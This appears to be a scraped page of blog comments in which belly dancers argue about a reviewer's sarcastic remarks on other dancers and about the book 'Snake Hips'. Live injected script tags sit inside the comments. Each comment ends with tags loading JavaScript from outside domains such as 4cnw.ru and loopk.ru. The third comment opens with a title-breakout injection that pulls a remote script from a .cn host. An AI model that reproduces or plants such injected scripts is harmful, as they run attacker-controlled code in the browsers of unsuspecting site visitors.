You said that we bellydancers are a sisterhood, and i completly agree with you, thats why i dont like some terms you qouted here:
"...belly dancer/expert wannabe teachers who are bursting like zaghareets in a hafla?..."
"...or an “experienced” crowd who thinks their breath smells like nag champa and they are professional dancers because they learned belly dance in a belly twins video and think they can teach what they learned through their TV set..."
i think is a bit offensive, we bellydancers try not to use those terms, like wannabe teachers it sounds a little inmature, all people try to dance the way they can, you know how rachel brice started to learn? "watching frame by frame a suhaila's video" she said... we are a community and we help everyone and most of all we never CRITICIZE each other...
the other thing about the belly twins i found it even worse... belly twins are good dancers doing their own style work, and nobody is nobody to use their names with sarcasm... now you are the one that looks no very as a sister...
we bellydancers dont make fun of each other, everyone is a good dancer in their own way and style, and anyone has their own ways to do things... thats why we are so fascinating, because we are different colors and flavors for everyones taste, being a really good and studied teacher doesnt give the right to anyone to criticize, make fun of, or being sarcastic...thats not so much the good manners you wrote about...maybe some people dont like yor work, but that doesnt mean they can be harsh with you...
as long as people like it and enjoy their dance they are doing their job, because thats what we all want, is not really about getting a certification or a degree, is about making people know the dance like it, and make them have a good time watching you... but most of all is about respect like you said.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

After some time I have been trying to finish this book I recently met the author on an event and signed my book ...then after struggling to make time between gigs and classes and events I finished it . And yes I share with Anne and you the same feeling, as I read your review before I bought the book and read the comment from this lady Angelique I thought hey there is something wrong here but before commenting I went and bought and read Snake hips and yes I found something very wrong something that for my taste is rude despite the lack of experience in the bellydance world that this member reflects on this comment I find that she has NOT the slightest idea of what the book says. One suggestion READ the book. Its hillarious how shes trying to I dont know...maybe its another statistic dancer/competitor/student/somewhatwannabe of what soffe wrote in this must read book for any bellydancer ....i know the feeling i got on every single word i read and yeas the feeling was that i related to it.
So congrats to Anne for a wonderful book and thumbs up for Martis.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |

| "></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--well im truly sorry if i offended by saying what i think about the comment martis made... i was never writing about the book at any time, in fact i quoted the phrases i dislike about martis comment so there would not be a missunderstanding like this... i stick to what i wrote i DID NOT like those 2 phrases she quoted there, and still think those phrases are rude and disrespectful, if u can be more especific about MY rudeness i'll appreciate it, i think you should read again my comment. And dont put words in my mouth... the book is not in question... if you read at the beggining i said "I LIKE WHAT SHE WROTE ABOUT THE READING" but "I DISLIKE SOME PHRASES". I thought bellydance was a sisterhood, now i feel like it is not for everybody... if somebody feel that way (the way martis expresses of bellytwins and people who hasn't learned or didnt have the chance to, but love the bellydance) i dont want that person to be my sister, sorry
I think if bellydance touches a soul, and that soul try to bellydance, the goal is acomplished. AGAIN the book or the comments about the book is not what i was talking about... i refer to her ways to express of dancers. Again sorry if I offended someone with saying the truth, that was NEVER my intention...
Im being true.
PS
The book is great, your siggestion was late, i read the book before i even read martis comment.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script> |
